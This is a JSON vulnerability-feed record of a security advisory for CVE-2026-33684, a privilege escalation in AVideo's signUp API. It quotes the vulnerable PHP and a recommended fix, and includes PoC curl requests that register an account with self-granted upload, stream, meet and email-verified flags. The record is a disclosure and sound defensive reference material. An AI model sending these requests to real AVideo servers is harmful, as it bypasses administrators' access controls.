{"id":"CVE-2026-33684","title":"AVideo's Privilege Escalation via Unguarded Permission Parameters in signUp API Allows Self-Granting Upload/Stream/Meet Permissions","summary":"AVideo's Privilege Escalation via Unguarded Permission Parameters in signUp API Allows Self-Granting Upload/Stream/Meet Permissions","severity":"medium","cvss":5.3,"cwe":["CWE-862"],"vendor":"wwbn","product":"wwbn/avideo","ecosystem":"composer","affected":["wwbn/avideo < 29.0"],"patched":["wwbn/avideo 29.0"],"published":"2026-06-22","updated":"2026-06-22","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-8j8m-p79x-g4jm","references":[{"url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-8j8m-p79x-g4jm"},{"url":"https://github.com/WWBN/AVideo/commit/061f242cba0e068cc1b461705fe839274b5038ff"},{"url":"https://github.com/advisories/GHSA-8j8m-p79x-g4jm"}],"tags":["ghsa","composer"],"ingestedAt":"2026-06-29T13:24:35.641Z","epss":0.00329,"epssPercentile":0.26143,"slug":"CVE-2026-33684","body":"## Overview\n\n## Summary\n\nThe `set_api_signUp` method in the API plugin accepts `emailVerified`, `canUpload`, `canStream`, and `canCreateMeet` parameters from user-supplied input and applies them to newly created accounts without verifying that the request was authenticated with a valid APISecret. Any anonymous user who can solve a CAPTCHA can self-grant elevated permissions during account registration.\n\n## Details\n\nThe authentication check in `set_api_signUp` (`plugin/API/API.php:4222`) allows either a valid APISecret (admin-level credential) or a solved CAPTCHA (anonymous access):\n\n```php\n// plugin/API/API.php:4222-4232\nif ($obj->APISecret !== @$_REQUEST['APISecret']) {\n    if(empty($_REQUEST['captcha'])){\n        return new ApiObject(\"Captcha is required\");\n    }\n    require_once $global['systemRootPath'] . 'objects/captcha.php';\n    $valid = Captcha::validation($_REQUEST['captcha']);\n    if(!$valid){\n        return new ApiObject(\"Captcha is wrong, reload it and try again\");\n    }\n}\n```\n\nAfter this check, both code paths (APISecret and CAPTCHA) reach the privilege parameter handling unconditionally:\n\n```php\n// plugin/API/API.php:4238-4249\nif (isset($_REQUEST['emailVerified'])) {\n    $global['emailVerified'] = intval($_REQUEST['emailVerified']);\n}\nif (isset($_REQUEST['canCreateMeet'])) {\n    $global['canCreateMeet'] = intval($_REQUEST['canCreateMeet']);\n}\nif (isset($_REQUEST['canStream'])) {\n    $global['canStream'] = intval($_REQUEST['canStream']);\n}\nif (isset($_REQUEST['canUpload'])) {\n    $global['canUpload'] = intval($_REQUEST['canUpload']);\n}\n```\n\nThese `$global` values are then consumed by `User::save()` (`objects/user.php:829-840`), which overrides the user object's permission fields:\n\n```php\n// objects/user.php:829-840\nif (isset($global['emailVerified'])) {\n    $this->emailVerified = $global['emailVerified'];\n}\nif (isset($global['canCreateMeet'])) {\n    $this->canCreateMeet = $global['canCreateMeet'];\n}\nif (isset($global['canStream'])) {\n    $this->canStream = $global['canStream'];\n}\nif (isset($global['canUpload'])) {\n    $this->canUpload = $global['canUpload'];\n}\n```\n\nNote that even though `userCreate.json.php:90` sets `canUpload` from the site's default configuration, `User::save()` subsequently overrides it with the attacker-controlled `$global` value.\n\nThe codebase already uses `self::isAPISecretValid()` to guard admin-only operations in other API methods (e.g., lines 294, 991, 1664, 2150), but this check is missing for the privilege parameters in `set_api_signUp`.\n\n## PoC\n\n```bash\n# Step 1: Get a CAPTCHA token\n# (Navigate to the signup page in a browser, solve the CAPTCHA, capture the token)\n\n# Step 2: Register with elevated privileges\ncurl -X POST 'https://target/plugin/API/set.json.php' \\\n  -d 'APIName=signUp' \\\n  -d 'user=attacker' \\\n  -d 'pass=Password123!' \\\n  -d 'email=attacker@example.com' \\\n  -d 'name=Attacker' \\\n  -d 'captcha=VALID_CAPTCHA_TOKEN' \\\n  -d 'emailVerified=1' \\\n  -d 'canUpload=1' \\\n  -d 'canStream=1' \\\n  -d 'canCreateMeet=1'\n\n# Expected: Account created with default (restricted) permissions\n# Actual: Account created with upload, stream, and meet permissions enabled,\n#         plus email marked as verified\n\n# Step 3: Verify elevated permissions by logging in and checking profile\ncurl -X POST 'https://target/plugin/API/set.json.php' \\\n  -d 'APIName=signIn' \\\n  -d 'user=attacker' \\\n  -d 'pass=Password123!'\n# Response will show canUpload=1, canStream=1, canCreateMeet=1, emailVerified=1\n```\n\n## Impact\n\n- **Email verification bypass:** Attackers can mark their accounts as email-verified without owning the email address, bypassing any email-gated functionality\n- **Unauthorized upload access:** Self-granted upload permissions allow uploading potentially malicious video content to the platform\n- **Unauthorized streaming access:** Self-granted streaming permissions allow unauthorized live streaming\n- **Unauthorized meeting creation:** Self-granted meet permissions allow creating meetings on the platform\n- **Policy bypass:** Platform administrators who intentionally restrict these permissions for new users (e.g., requiring manual approval before granting upload rights) have their access controls circumvented\n\n## Recommended Fix\n\nWrap the privilege parameter handling in an `isAPISecretValid()` check so that only admin-authenticated requests can set these values:\n\n```php\n// plugin/API/API.php — replace lines 4238-4249 with:\nif (self::isAPISecretValid()) {\n    if (isset($_REQUEST['emailVerified'])) {\n        $global['emailVerified'] = intval($_REQUEST['emailVerified']);\n    }\n    if (isset($_REQUEST['canCreateMeet'])) {\n        $global['canCreateMeet'] = intval($_REQUEST['canCreateMeet']);\n    }\n    if (isset($_REQUEST['canStream'])) {\n        $global['canStream'] = intval($_REQUEST['canStream']);\n    }\n    if (isset($_REQUEST['canUpload'])) {\n        $global['canUpload'] = intval($_REQUEST['canUpload']);\n    }\n}\n```\n\n## Affected packages\n\n- `wwbn/avideo < 29.0`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `wwbn/avideo 29.0`","depth":"sunlit","depthScore":29,"depthScoreParts":{"impact":29.2,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}